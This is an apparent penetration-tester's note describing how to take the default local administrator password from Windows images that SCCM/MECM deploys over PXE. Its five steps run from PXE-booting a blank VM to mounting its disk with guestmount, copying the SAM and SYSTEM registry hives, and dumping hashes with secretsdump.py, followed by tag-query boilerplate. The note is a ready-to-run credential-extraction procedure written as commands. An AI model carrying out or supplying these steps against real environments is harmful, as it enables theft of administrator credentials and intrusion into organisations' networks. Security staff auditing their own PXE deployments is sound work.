Use this technique in PXE-Enabled SCCM/MECM Environments
This technique can be used to extract the default local admin password from a default installation delivered by PXE via MECM/SCCM
Step One - Create the VM
Create a blank VM
Do not provide ISO
Enable BIOS instead of UEFI
Step Two - Boot from PXE
Upon booting up the VM (in vmware) press F12 when prompted to boot from PXE.
Step Three - Proceed with PXE/SCCM Windows installation
Install one of the images for a client Windows 10/11 OS.
Power down the VM upon completion
Step Four - Mount the VHD/VMDK Virtual Hard Disk File
# Mount the VHD
sudo guestmount -a /path/to/vm.vhd -m /dev/sda1 /mnt/vhd --ro
# Copy the hives
sudo cp /mnt/vhd/Windows/System32/config/SYSTEM ~/extracted/
sudo cp /mnt/vhd/Windows/System32/config/SAM ~/extracted/
Step Five - Dump the SAM Database with secretsdump.py
secretsdump.py -sam ~/extracted/SAM -system ~/extracted/SYSTEM LOCAL
Related
Related Notes
All Related Notes
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "windows") OR contains(tags, "sam") OR contains(tags, "vhd") OR contains(tags, "vmdk") OR contains(tags, "dumping") OR contains(tags, "pxe")SORT file.ctime DESC
windows
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "windows")SORT file.ctime DESC
sam
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "sam")SORT file.ctime DESC
vhd
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "vhd")SORT file.ctime DESC
vmdk
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "vmdk")SORT file.ctime DESC
dumping
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "dumping")SORT file.ctime DESC
pxe
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "pxe")SORT file.ctime DESC